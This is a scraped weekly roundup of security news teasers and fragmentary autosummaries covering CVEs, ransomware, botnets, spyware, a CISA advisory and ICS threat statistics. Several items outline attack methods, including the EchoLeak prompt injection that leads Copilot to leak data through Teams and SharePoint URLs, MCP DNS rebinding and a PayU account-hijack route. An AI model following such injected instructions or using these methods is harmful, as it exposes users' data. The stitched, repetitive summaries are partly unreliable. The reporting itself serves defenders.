Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053) For June 2025 Patch Tuesday, Microsoft has fixed 66 new CVEs, including a zero-day exploited in the wild (CVE-2025-33053). Unpatched Wazuh servers targeted by Mirai botnets (CVE-2025-24016) Two Mirai botnets are exploiting a critical remote code execution vulnerability (CVE-2025-24016) in the open-source Wazuh XDR/SIEM platform, Akamai researchers have warned. Want fewer security … More
The post Week in review: Microsoft fixes exploited zero-day, Mirai botnets target unpatched Wazuh servers appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: June 13, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Contrast Security, Cymulate, Lemony, SpecterOps, Thales, and Vanta. Unpacking the security complexity of no-code development platforms In this Help Net Security interview, Amichai Shulman, CTO at Nokod Security, discusses how the abstraction layer in no-code environments complicates security by obscuring data flow, identity propagation, and control logic. AI forces IT leaders to rethink their network strategies As AI assistants, agents, and data-driven workloads reshape how work gets done, they’re creating more latency-sensitive, and more complex network traffic, according to Cisco. "OffSec has released Kali Linux 2025.2, the most up-to-date version of the widely used penetration testing and digital forensics platform. KDE Plasma 6.3 in Kali Linux 2025.2 (Source: OffSec) New in Kali Linux 2025.2 As per usual, the newest Kali version comes with new community wallpapers and new versions of the KDE Plasma and GNOME graphical desktop environments. This time around, the Kali Menu is new, as well: it has been reorganized to follow the … More
The post Kali Linux 2025.2 delivers Bloodhound CE, CARsenal, 13 new tools appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Files before encryption (top) and after (bottom) Source: Trend Micro Trend Micro’s analysis reveals that Anubis supports several commands at launch, including for privilege elevation, directory exclusion, and target paths for encryption. "Autosummary:
Unusual toolset used in recent Fog Ransomware attack Pierluigi Paganini June 14, 2025 June 14, 2025 Fog ransomware operators used in a May 2025 attack unusual pentesting and monitoring tools, Symantec researchers warn. "78% of public sector organizations are operating with significant security debt, flaws left unaddressed for more than a year, according to Veracode. 55% are burdened with ‘critical’ security debt, representing long-standing vulnerabilities with severe risk potential. Public sector flaw remediation timeline based on survival analysis (Source: Veracode) Public sector security debt exceeds industry average The research reveals that public sector entities require an average of 315 days to fix half their software vulnerabilities, significantly higher … More
The post Security flaws in government apps go unpatched for years appeared first on Help Net Security.
"Autosummary:
The report identifies five key metrics that measure an organization’s application security maturity and debt management capability, revealing distinct performance gaps between leading and lagging public sector organizations: Flaw prevalence : Leading agencies have flaws in fewer than 33% of applications, while lagging agencies show flaws in 100% of their applications. "Autosummary:
Over the past two years, Predator operators have been flagged in over a dozen counties, such as Angola, Armenia, Botswana, the Democratic Republic of the Congo, Egypt, Indonesia, Kazakhstan, Mongolia, Mozambique, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. The vulnerability, tracked as CVE-2025-43200, was addressed on February 10, 2025, as part of iOS 18.3.1, iPadOS 18.3.1, iPadOS 17.7.5, macOS Sequoia 15.3.1, macOS Sonoma 14.7.4, macOS Ventura 13.7.4, watchOS 11.3.1, and visionOS 2.3.1. "Autosummary:
CVE-2025-49216 (CVSS score 9.8): Authentication Bypass Vulnerability: An authentication bypass vulnerability in the Trend Micro Endpoint Encryption PolicyServer could allow an attacker to access key methods as an admin user and modify product configurations on affected installations. The company fixed the following flaws in Apex Central: CVE-2025-49219 (CVSS score 9.8): Deserialization of Untrusted Data RCE Vulnerability:Please note: an attacker must first obtain the ability to execute low-privileged code on the target system to exploit this vulnerability. "Autosummary:
" Quarterly earnings release delayed As the company revealed after disclosing the incident last month, it was forced to take down corporate systems, some in-store services, and the e-commerce website as a precaution on May 26. "Autosummary:
The agency has outlined the below mitigations that organizations, including third-party service providers that make use of SimpleHelp to connect to downstream customers, can implement to better respond to the ransomware activity - Identify and isolate SimpleHelp server instances from the internet and update them to the latest version Notify downstream customers and instruct them to take actions to secure their endpoints Conduct threat hunting actions for indicators of compromise and monitor for unusual inbound and outbound traffic from the SimpleHelp server (for downstream customers) Disconnect affected systems from the internet if they have been encrypted by ransomware, reinstall the operating system, and restore data from a clean backup Maintain periodic clean, offline backups Refrain from exposing remote services such as Remote Desktop Protocol (RDP) on the web CISA said it does not encourage victims to pay ransoms as there is no guarantee that the decryptor provided by the threat actors will help recover the files. According to Trend Micro, as of April 2025, the Fog threat actors have claimed 100 victims on its data leak site since the start of the year, with a majority of the victims associated with technology, education, manufacturing, and transportation sectors. "Autosummary:
The IT giant addressed the flaw CVE-2025-43200 on February 10, 2025, with the release of iOS 18.3.1, iPadOS 18.3.1, iPadOS 17.7.5, macOS Sequoia 15.3.1, macOS Sonoma 14.7.4, macOS Ventura 13.7.4, watchOS 11.3.1, and visionOS 2.3.1. "Autosummary:
Its capabilities include file operations, keylogging, and webcam/microphone access Skuld Stealer : Delivered as "skul.exe," this is an info-stealer that targets browser credentials, cookies, Discord tokens, and cryptocurrency wallet data (injects JS to steal mnemonic phrases and passwords using Discord webhooks) : Delivered as "skul.exe," this is an info-stealer that targets browser credentials, cookies, Discord tokens, and cryptocurrency wallet data (injects JS to steal mnemonic phrases and passwords using Discord webhooks) ChromeKatz: "Autosummary:
Similar to ChatGPT, Meta AI can generate text, answer questions, and help users plan, brainstorm, and strategize on various issues. WhatsApp, Facebook, and Instagram Note: Conversations with Meta AI on WhatsApp are not protected by end-to-end encryption and may be used for AI training To limit Meta’s use of your data for AI training: Go to Settings & Privacy > Privacy Center . Deleting AI conversation data Meta has introduced commands to delete information shared in any chat with an AI: For example, type /reset-ai in a conversation on Messenger, Instagram, or WhatsApp to delete your AI messages. "Autosummary:
Image As Cybernews describes, data exfiltrated from S5 Agency World includes details of invoices, email correspondence, inspection reports, employees" COVID-19 vaccinations, copies of passports, and internal corporate documents. In recent weeks Bert has claimed to have stolen information from organisations around the world including a ticket company, a Turkish hospital, an American electronics firm, a Malaysian construction firm, a Columbian IT solutions business, and a Taiwanese company producing equipment for semiconductors. "Autosummary:
"Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "Autosummary:
The second affected the Ministry of Finance, the Central Bank of Paraguay, and Itaipú, where a file containing over 17,000 records was made public, including sensitive data such as payments to public officials, salaries, full names, and ID numbers.These events, with a “hack-and-leak” narrative, could be interpreted as a landmark in known cybersecurity incidents today, by size and scale, as the entire country was extorted due to a massive data breach. "Autosummary:
“A corporate Whole Foods spokesperson apologized for the inconvenience and said the company is working to restock shelves quickly, but declined to answer specific questions.” reported NBC News. "Nearly half of of mobile users encounter mobile scams daily, with people in the US and UK more likely to be targeted than those in other regions, according to Malwarebytes. Most users say it’s hard to tell a scam from something real, and very few feel confident in spotting one. Younger generations, like Gen Z and Millennials, are the most exposed. They’re more likely to see scams regularly compared to older users. No channel is … More
The post 44% of mobile users encounter scams every day appeared first on Help Net Security.
"Autosummary:
No channel is safe Scams and malware now hit through every channel, calls, texts, emails, and even apps. Gen Z hit hardest by extortion scams 74% of mobile users have encountered social engineering scams, and one in three have fallen victim, illustrating how effective scammers are at exploiting human trust. "Cybercriminals are stealing data and running full-scale businesses around it. Europol’s latest Internet Organised Crime Threat Assessment (IOCTA) report reveals how personal data is now a core currency in the underground economy. Data is the product Cybercriminals go after everything from login credentials to credit card numbers, medical records, and social media accounts. The data criminals collect helps them access accounts, impersonate users, or sell that access to others. Europol stresses that access to an … More
The post Cybercriminals are turning stolen data into a thriving black market appeared first on Help Net Security.
"Autosummary:
AI opens new attack paths Besides improving phishing, criminals are using AI to create fake identities, forge digital fingerprints, and bypass security checks.Infostealers are a type of malware designed to extract personal data from infected devices, such as usernames, passwords, and browser history. "Autosummary:
Apart from these tools, Symantec also lists the following as part of Fog ransomware’s latest arsenal: Adapt2x C2 – open-source alternative to Cobalt Strike supporting post-exploitation actions Process Watchdog – system monitoring utility that can restart key processes PsExec – Microsoft Sysinternals tool for remote execution across networked machines Impacket SMB – Python library with low-level programmatic access to SMB, likely used for deploying the ransomware payload on the victim’s machine. "Autosummary:
Make Way for the MCP Rebinding Attack The rapid ascent of MCP as the "connective tissue for enterprise automation and agentic applications" has also opened up new attack avenues, such as Domain Name System (DNS) rebinding, to access sensitive data by exploiting Server-Sent Events (SSE), a protocol used by MCP servers for real-time streaming communication to the MCP clients. Scope Violation: Copilot mixes untrusted attacked input with sensitive data to LLM context by the Retrieval-Augmented Generation (RAG) engine Retrieval: Copilot leaks the sensitive data to the attacker via Microsoft Teams and SharePoint URLs "As a zero-click AI vulnerability, EchoLeak opens up extensive opportunities for data exfiltration and extortion attacks for motivated threat actors," Aim Security said. "Autosummary:
Below are the descriptions for these flaws: CVE-2025-24016 (CVSS score 9.9) Wazuh Server Deserialization of Untrusted Data Vulnerability CVE-2025-33053 (CVSS score 8.8) Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability This week, Akamai researchers warned that multiple Mirai botnets exploit the critical remote code execution vulnerability CVE-2025-24016 (CVSS score of 9.9) affecting Wazuh servers.U.S. CISA adds Wazuh, and WebDAV flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini June 12, 2025 June 12, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Wazuh, and WebDAV flaws to its Known Exploited Vulnerabilities catalog. "The LockBit ransomware-as-a-service (RaaS) operation has netted around $2.3 million USD within 5 months, the data leak stemming from the May 2025 hack of a LockBit affiliate panel has revealed. From that sum, the operators took their 20% cut (approximately USD 456,000), and they additionally “earned” some $10,000-$11,000 USD from affiliates that registered through the panel. “What this leak truly shows is the complex and ultimately less glamorous reality of their illicit ransomware activities. While … More
The post LockBit panel data leak shows Chinese orgs among the most targeted appeared first on Help Net Security.
"Autosummary:
Insights from the LockBit data leak The data leak, which Trellix researchers believe comes from the database behind LockBit’s “Lite” affiliates admin panel, encompasses data from December 18, 2024 to April 29, 2025, and contains details on LockBit ransomware affiliates, victim organizations, chat logs, cryptocurrency wallets and ransomware build configurations. "The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp RMM since January 2025.
SimpleHelp versions 5.5.7 and earlier contain several vulnerabilities, including CVE-2024-57727—a path traversal vulnerability.1 Ransomware actors likely leveraged CVE-2024-57727 to access downstream customers’ unpatched SimpleHelp RMM for disruption of services in double extortion compromises.1
CISA added CVE-2024-57727 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 13, 2025.
CISA urges software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise.
Download the PDF version of this report:
CISA "
Autosummary:
Anthony Bradshaw, et. al., “DragonForce Actors Target SimpleHelp Vulnerabilities to Attack MSP, Customers,” Sophos News, May 27, 2025, https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/. 2. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by CISA. SimpleHelp Endpoints Determine if an endpoint is running the remote access (RAS) service by checking the following paths depending on the specific environment: Windows: %APPDATA%\JWrapper-Remote Access Linux: /opt/JWrapper-Remote Access MacOs: /Library/Application Support/JWrapper-Remote Access If RAS installation is present and running, open the serviceconfig.xml file in <file_path>/JWrapper-Remote Access/JWAppsSharedConfig/ to determine if the registered service is vulnerable. "Autosummary:
"These scripts redirect site visitors to various scam pages through traffic broker networks associated with VexTrio, one of the largest known cybercriminal affiliate networks that leverages sophisticated DNS techniques, traffic distribution systems, and domain generation algorithms to deliver malware and scams across global networks," GoDaddy noted in a report published in March 2025. "Autosummary:
Paragon Graphite Spyware used a zero-day exploit to hack at least two journalists’ iPhones Pierluigi Paganini June 12, 2025 June 12, 2025 Security researchers at Citizen Lab revealed that Paragon’s Graphite spyware can hack fully updated iPhones via zero-click attacks. On June 5, 2025, Italy’s intelligence oversight committee (COPASIR) confirmed the government used Paragon’s Graphite spyware to spy on Luca Casarini and Dr. Beppe Caccia, but couldn’t determine who targeted journalist Mr. Cancellato. "Autosummary:
"In cybersecurity, there’s an urge to collect as much data as possible. Logs, alerts, metrics, everything. But more data doesn’t necessarily translate to better security. SOCs deal with tens of thousands of alerts every day. It’s more than any person can realistically keep up with. When too much data comes in at once, things get missed. Responses slow down and, over time, the constant pressure can lead to burnout. According to a Vectra AI survey, … More
The post The path to better cybersecurity isn’t more data, it’s less noise appeared first on Help Net Security.
"Autosummary:
What AI does well: Processes data faster than humans Reduces alert fatigue by flagging high-risk patterns Finds anomalies that may be missed in manual reviews What to watch out for: AI can still miss or misclassify threats Results depend on the quality of input data Human oversight and tuning are essential AI is not magic. According to a Vectra AI survey, 71% of SOC practitioners worry they will miss a real attack buried in a flood of alerts, and 51% believe they cannot keep pace with the increasing number of security threats. If a security incident happens, take time to review which logs and alerts helped find or stop the threat. "OWASP Nettacker is a free, open-source tool designed for network scanning, information gathering, and basic vulnerability assessment. Built and maintained by the OWASP community, Nettacker helps security pros automate common tasks like port scanning, service detection, and brute-force attacks. It offers a controlled and extensible framework for running these tests. What it does Nettacker scans networks to find weaknesses. It maps out live hosts, open ports, services, and basic misconfigurations. It can also run some … More
The post OWASP Nettacker: Open-source scanner for recon and vulnerability assessment appeared first on Help Net Security.
"Autosummary:
Future plans include improvements in performance and multi-threading, an improved WebUI (including the introduction of a dashboard), a workflow feature, and integrations with other tools,” Stepanyan explained. Future plans and download “We are working on releasing the next version, 0.4.1, very soon, which will include the new custom wordlist feature and several new modules. "Autosummary:
Other vulnerabilities of note include elevation of privilege flaws in Common Log File System Driver (CVE-2025-32713, CVSS score: 7.8), Windows Netlogon (CVE-2025-33070, CVSS score: 8.1), and Windows SMB Client (CVE-2025-33073, CVSS score: 8.8), as well as a critical unauthenticated RCE vulnerability in the Windows KDC Proxy Service (CVE-2025-33071, CVSS score: 8.1)." The company said it also observed the threat actor leveraging several previously undocumented tools such as the following - Credential Dumper, which targets an already-compromised Domain Controller to steal Active Directory and Domain Controller credential-related files Passive backdoor, which listens for incoming requests and executes shellcode payloads Keylogger, a custom C++ tool that records all keystrokes and writes them to a file under "C:/windows/temp/~TN%LogName%.tmp" The keylogger notably lacks any C2 mechanism, meaning that it likely works in conjunction with another component that can exfiltrate the file to the attackers. Microsoft, however, is not affected by CVE-2025-4275 (aka Hydroph0bia), another Secure Boot bypass vulnerability present in an InsydeH2O UEFI application that allows digital certificate injection through an unprotected NVRAM variable ("SecureFlashCertData"), resulting in arbitrary code execution at the firmware level. "For June 2025 Patch Tuesday, Microsoft has fixed 66 new CVEs, including a zero-day exploited in the wild (CVE-2025-33053). Also, Adobe Commerce and Magento Open Source users are urged to update quickly. About CVE-2025-33053 CVE-2025-33053 is a remote code execution vulnerability in Web Distributed Authoring and Versioning (WebDAV), which is a protocol for extending HTTP protocol functionality for interacting with files. Flagged by Check Point researchers, the vulnerability has been exploited in March 2025 to … More
The post Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053) appeared first on Help Net Security.
"Autosummary:
Among the vulnerabilities that are more likely to be exploited are: CVE-2025-33070, a Windows Netlogon that could allow attackers to gain domain administrator privileges by sending a specially crafted authentication requests to the domain controller CVE-2025-47162, CVE-2025-47164 and CVE-2025-47167 – RCE flaws in Microsoft Office (that have yet to be fixed in Microsoft 365 Apps for Enterprise) CVE-2025-32717, a Microsoft Word RCE vulnerability that could be exploited via a malicious RTF file, which the victim would open or just view in the preview pane CVE-2025-33071, a use after free flaw in Windows KDC Proxy Service (KPSSVC), which could allow an unauthenticated attacker to execute code over a network. "Autosummary:
Countries involved in Operation Secure include Brunei, Cambodia, Fiji, Hong Kong (China), India, Indonesia, Japan, Kazakhstan, Kiribati, Laos, Macau (China), Malaysia, Maldives, Nauru, Nepal, Papua New Guinea, Philippines, Samoa, Singapore, Solomon Islands, South Korea, Sri Lanka, Thailand, Timor-Leste, Tonga, Vanuatu, and Vietnam. "Autosummary:
Firsov estimates that the flaw impacts over 53 million hosts (and tools like cPanel, Plesk, ISPConfig, DirectAdmin, etc.), he said that details and PoC will be published soon. "Autosummary:
The loader then drops the primary payload, "Horus Agent," a custom C++ Mythic C2 implant that supports command execution for system fingerprinting, config changes, shellcode injection, and file operations. "Autosummary:
The results of Operation Secure are significant, resulting in: Over 20,000 malicious IPs/domains linked to infostealers were taken down 41 servers supporting info-stealers operations were seized 32 suspects were arrested 100 GB of data was confiscated 216,000 victims were notified The authorities also identified a large cluster of 117 servers in Hong Kong that were used as command-and-control (C2) infrastructure for phishing, online fraud, and social media scam operations. "Autosummary:
Error shown when attempting to log into Erie Insurance site Today, Erie Indemnity Group filed a Form 8-K filing with the U.S. Securities and Exchange Commission, stating it detected "unusual network activity" on June 7, 2025. "Autosummary:
Delta, Southwest, United, Lufthansa, Air France, American Airlines, Air Canada, Alaska Airlines, and JetBlue all have seats on the ARC board. "Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Drata – The world’s most advanced Trust Management platform – making risk and compliance management accessible, continuous, and 10x more automated than ever before. "The post Cybersecurity jobs available right now: June 10, 2025 appeared first on Help Net Security.
"Autosummary:
Automation tester (Infosec) – Vulnerability management WTW | India | On-site – View job details As an Automation tester (Infosec) – Vulnerability management, you will create, maintain, and execute appropriate security testing processes to enable timely detection, risk-based prioritization, and co-ordinate the remediation of security testing findings. Senior Network Security Engineer – F5/Firewall Intertec Systems | UAE | On-site – View job details As a Senior Network Security Engineer – F5/Firewall, you will engage in planning, scheduling, and implementing network upgrades, implementations, and migrations for clients in a timely manner and during times that will have the least impact on the users of the affected systems. Manager, Cloud Security Engineer Lead Pfizer | Ireland | Hybrid – View job details As a Manager, Cloud Security Engineer Lead, you will lead and manage engineers in designing, developing, and maintaining cloud-native security solutions for enhancements and new services to protect Pfizer cloud infrastructure. "Autosummary:
According to BI.ZONE, the threat actor obtains initial access using phishing emails, leveraging the foothold to steal documents, Telegram messenger data, and drop tools like Mipko Employee Monitor, WebBrowserPassView, and Defender Control to interact with the infected system, harvest passwords, and disable antivirus software. "Autosummary:
But because the endpoint checks for a valid token linked to a hard-coded email address ("commerce.pro@payu[.]in") and there exists another REST API to generate an authentication token for a given email ("/payu/v1/generate-user-token"), an attacker could exploit this behavior to obtain the token corresponding to "commerce.pro@payu[.]in" and send a request to "/payu/v1/get-shipping-cost" to hijack any account. "Autosummary:
The region had significantly higher, compared to the global average, percentages of ICS computers on which the following categories of malicious objects were blocked: Worms — 2.8 times higher; Viruses — 2.5 times higher; Spyware — 1.7 times higher; Ransomware — 1.6 times higher; Web miners — 1.5 times higher; Malicious programs targeting AutoCAD — 1.5 times higher; Malicious scripts and phishing pages — 1.4 times higher; Malicious documents — 1.3 times higher; The greatest differences in regional percentages compared to the global averages were observed for the following threat categories: Ransomware — 1.9 times higher, second place among all regions; Worms — 1.5 times higher, third place among all regions; Spyware — 1.5 times higher, third place among all regions; Malicious documents — 1.5 times higher, third place among all regions; Malicious scripts and phishing pages — 1.3 times higher, third place among all regions; Viruses — 1.3 times higher. Comparative analysis Threat categories Compared to global averages, the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Web miners — by a factor of 1.4; Malicious documents — by a factor of 1.3; Spyware — by a factor of 1.2; Worms — by a factor of 1.2; Malicious scripts and phishing pages — by a factor of 1.1; Miners in the form of executable files for Windows — by a factor of 1.1. Comparative analysis Threat categories Compared to global averages, Southern Europe shows higher percentages of ICS computers on which the following threat categories were blocked: Malicious documents — by a factor of 2.2; of 2.2; Spyware — by a factor of 1.6; of 1.6; Ransomware — by a factor of 1.5; of 1.5; Malicious scripts and phishing pages — by a factor of 1.4. Percentage of ICS computers on which the activity of malicious objects from various categories was blocked Changes in the percentage of ICS computers on which malicious documents were blocked, Q1 2025 Malicious scripts and phishing pages Attackers use malicious scripts to perform a broad range of tasks — from collecting data, tracking, and redirecting the user’s browser to a malicious web resource, to downloading various types of malware (such as spyware, programs for covert cryptocurrency mining, or ransomware) onto the system or into the user’s browser.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Comparative analysis Threat categories Compared to global averages, the region showed noticeably higher percentages of ICS computers on which the following threat categories were blocked: Web miners — by a factor of 1.3; Viruses — by a factor of 1.2; Malicious scripts and phishing pages — by a factor of 1.1; Worms — by a factor of 1.1. Threat sources For all threat sources, the percentage of ICS computers in the region on which malicious objects were blocked exceeds the global average: Threats in network folders — by a factor of 2.3 ; ; Threats from email clients — by a factor of 1.4; Threats from removable media — by a factor of 1.4; Internet threats — by a factor of 1.2. Compared to global averages, the region has significantly higher percentages of ICS computers affected by the following categories of malicious objects: AutoCAD malware — by a factor of 3.5; Ransomware — by a factor of 2; Viruses — by a factor of 1.9; Worms — by a factor of 1.1; Spyware — by a factor of 1.1. Changes in the percentage of ICS computers on which web miners were blocked, Q1 2025 Miners in the form of executable files for Windows The top three regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked: Central Asia — 1.72%; Russia — 1.04%; Eastern Europe — 0.85%. In regional rankings in Q1 2025, Central Asia demonstrated the following results: First place by percentage of ICS computers on which miners in the form of executable files for Windows were blocked ; place by percentage of ICS computers on which were blocked Second place by percentage of ICS computers on which worms were blocked ; place by percentage of ICS computers on which were blocked Third place by percentage of ICS computers on which denylisted internet resources were blocked. In Q1 2025, East Asia ranked among all regions: First by percentage of ICS computers on which ransomware was blocked ; by percentage of ICS computers on which was blocked Second by percentage of ICS computers on which AutoCAD malware was blocked; by percentage of ICS computers on which was blocked; Third by percentage of ICS computers on which viruses were blocked. Comparative analysis Threat categories Compared to global averages, Latin America shows higher percentages of ICS computers on which the following threat categories were blocked: Malicious documents — by a factor of 1.8; Malicious scripts and phishing pages — by a factor of 1.3; Web miners — by a factor of 1.3. Compared to global figures, the region has significantly higher percentages of ICS computers on which the following categories of malicious objects were blocked: Malicious programs for AutoCAD — 7.8 times higher; Viruses — 5.7 times higher; Web miners — 1.5 times higher; Spyware — 1.4 times higher. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q1 2025 All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups: Over 25% Africa — 29.6% South-East Asia — 29.1% In the regions within this group, OT computers are generally overexposed to cyberthreats. In Q1 2025, the percentage of ICS computers on which malicious objects were blocked increased in the following sectors and OT infrastructures: Biometrics — by a factor of 1.1; of 1.1; Construction — by a factor of 1.1; of 1.1; Manufacturing — by a factor of 1.1; of 1.1; Building automation. The region’s percentage figures exceeded global averages for all threat sources: Removable media threats — by a factor of 4.7 ; ; Email threats — by a factor of1.4; Internet threats — by a factor of 1.3; Threats in network folders — by a factor of 1.1. Quarterly changes and trends Threat categories In Q1 2025, Southern Europe ranks first among all regions by growth in the percentage of ICS computers on which the following threat categories were blocked: Spyware; Worms; Malware for AutoCAD.20–25% Central Asia — 24.2% Middle East — 24.1% Eastern Europe — 21.8% South Asia — 21.0% East Asia — 21.0% Latin America — 21.0% Southern Europe — 20.8% The regions within this group may face specific challenges in isolating their OT infrastructure from potential cyberthreats. Kill chain example: the use of legitimate mining tools in cryptomining attacks Ransomware Top three regions by percentage of ICS computers on which ransomware was blocked: East Asia — 0.32%; Middle East — 0.30%; Africa — 0.25%.The list is used to block primarily the following threats on ICS computers: Known malicious URLs and IP addresses used by attackers to host payloads and configurations; Suspicious (untrusted) web resources offering entertainment or gaming content, often abused to deliver unwanted software, cryptocurrency miners, or malicious scripts; CDN nodes leveraged by threat actors to deliver malicious scripts via legitimate websites; File-sharing and data exchange services, including public repositories, that are often used to host next-stage payloads and configurations. Threat sources In Q1 2025, Central Asia exceeded global averages in the percentage of ICS computers on which the following malicious objects were blocked: Threats from removable media — by a factor of 1.5; — by a factor of 1.5; Threats in network folders — by a factor of 1.1. Regions ranked by percentage of ICS computers on which threats were blocked when connecting removable media, Q1 2025 Frequent attempts to infect protected systems when connecting USB drives may indicate: low connectivity in the organization’s OT network (a large number of remote sites not linked to the main network by high-speed and reliable communication lines); low level of enterprise IT infrastructure development (the absence of other standard internal systems for file storage and transfer); the presence of a significant unprotected part of the infrastructure that acts as a source of initial infection for removable drives; poor cybersecurity culture overall. Viruses Top three regions by percentage of ICS computers on which viruses were blocked: South-East Asia, a clear leader — 8.68%; Africa — 3.87%; East Asia — 2.85%. Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2025 Threat actors use malicious scripts for a wide range of purposes — from collecting data, tracking, and redirecting a user’s browser to a malicious web resource, to delivering a variety of malware (including spyware, malware for covert cryptocurrency mining or ransomware) to the user’s system or browser. AutoCAD malware The top three regions ranked by percentage of ICS computers on which malicious AutoCAD programs were blocked are the same regions that top the virus ranking: South-East Asia — 2.65%; East Asia — 1.19%; Africa — 0.51%. In Q1 2025, Africa ranked first among all regions by the percentage of ICS computers on which the following categories of malicious objects were blocked: Denylisted internet resources; Spyware; Worms; Web miners. Comparative analysis Threat categories Compared to global averages, Russia has higher percentages of ICS computers on which the following threats were blocked: Denylisted internet resources — by a factor of 1.1; of 1.1; Miners in the form of executable files for Windows. Web miners running in browsers The top three regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa — 0.81%; South-East Asia — 0.80%; Eastern Europe — 0.76%. Threat sources In the Middle East, the percentages of ICS computers on which the following threats were blocked significantly exceed global averages: Email threats — 1.8 times higher; times higher; Threats on removable media — 1.7 times higher. Threat sources In Q1 2025, the percentage of ICS computers on which malicious objects were blocked increased for two threat sources: Internet threats — by a factor of 1.1; Email threats — by a factor of 1.1. Compared to the corresponding global averages, the following industries in East Asia showed higher percentages of ICS computers on which malicious objects were blocked: Electric power sector — by a factor of 1.3; Construction — by a factor of 1.1; Manufacturing — by a factor of 1.1. In Q1 2025, the top three regions by percentage of ICS computers on which spyware was blocked included: Africa — 7.05%; Southern Europe — 6.52%; Middle East — 6.25%. Other indicators that increased were the percentages of ICS computers on which the following threats were blocked: Worms — by a factor of 1.2; of 1.2; Miners in the form of executable files for Windows — by a factor of 1.2; of 1.2; Malicious documents — by a factor of 1.1.Changes in the percentage of attacked ICS computers in Q1 2025 Threat sources The internet (access to malicious or compromised web resources; malicious content distributed via messengers, cloud data storage and processing services, and CDNs), email clients (phishing emails), and removable media remain the primary sources of threats to computers in the OT infrastructure of organizations. Top three regions by percentage of ICS computers affected by threats in network folders in Q1 2025: East Asia, the undisputed leader — 0.27%; South-East Asia — 0.16%; South Asia — 0.11%. The percentage of ICS computers on which malicious objects were blocked exceeds global averages most significantly in the following industries: Electric power sector — by a factor of 1.2; Construction — by a factor of 1.1; Building automation — by a factor of 1.1. Quarterly changes and trends Threat categories The highest increases over the previous quarter were observed in Q1 2025 in the percentage of ICS computers on which the following categories of malicious objects were blocked: Ransomware — by a factor of 1.4, with East Asia ranking first among regions based on growth in this category. Regions ranked by percentage of ICS computers on which viruses were blocked, Q1 2025 Apparently, high percentage figures for self-propagating malware and threats in network folders indicate that a significant part of the infrastructure is unprotected, becoming a source of secondary malware infections (malware propagation), and point to a lack of segmentation in enterprise networks in the region. Quarterly changes and trends Threat categories The largest increases from the previous quarter in Australia and New Zealand were recorded for percentages of ICS computers on which the following categories of threats were blocked: Malicious scripts and phishing pages — by a factor of 1.1, second place among regions by growth in this category. Africa Current threats Africa has for many years topped the ranking of regions by percentage of ICS computers on which malicious objects were blocked, with figures significantly exceeding the global averages – in Q1 2025, the percentage was 1.4 times higher than the global figure. "Autosummary:
Accomplices living abroad reached out to targets in the United States via unsolicited social media, phone calls, text messages, and online dating services to gain their trust, promoting fraudulent digital asset investments and falsely claiming that the victims" funds" value increased after they tricked them into investing, when, in fact, their money was stolen. "Autosummary:
With the launch of our free, AI-powered digital safety companion Scam Guard, users can review any concerning text, email, phone number, link, image, or online message and receive on the spot guidance to avert and report scams.By surveying 1,300 people over the age of 18 in the US, UK, Austria, Germany, and Switzerland, Malwarebytes can reveal a mobile reality full of tension: high concern, low action, and increasingly blurred lines between what’s safe and what’s not. "Autosummary:
Nonetheless, a weakness allowing an attacker to trace phone numbers to Google accounts like this creates a massive risk for phishing and SIM-swapping attacks—especially since the majority of users will have their primary phone number as their account recovery number. "Autosummary:
At the end of the day, non-human identities and human identities may have different characteristics and needs, but both require an end-to-end approach that protects them before, during, and after authentication.Those secrets, keys, and tokens are just as sensitive as the credentials used by humans, and in some cases, even more so, as they can provide adversaries with powerful access to specific applications and services if they"re leaked.NHIs — including application secrets, API keys, service accounts, and OAuth tokens — have exploded in recent years, thanks to an ever-expanding array of apps and services that must work together and identify one another on the fly.How do we make sure we"re managing those?" Final thoughts Non-human identities are essential to businesses today, helping them automate processes, enable integrations, and ensure smooth operations. "Autosummary:
Mirai botnets exploit Wazuh RCE, Akamai warned Pierluigi Paganini June 10, 2025 June 10, 2025 Mirai botnets are exploiting CVE-2025-24016, a critical remote code execution flaw in Wazuh servers, Akamai warned.The botnet also exploited other vulnerabilities, including Hadoop YARN, TP-Link AX21, and ZTE routers, using dynamic infrastructure to evade detection and spread rapidly. "Autosummary:
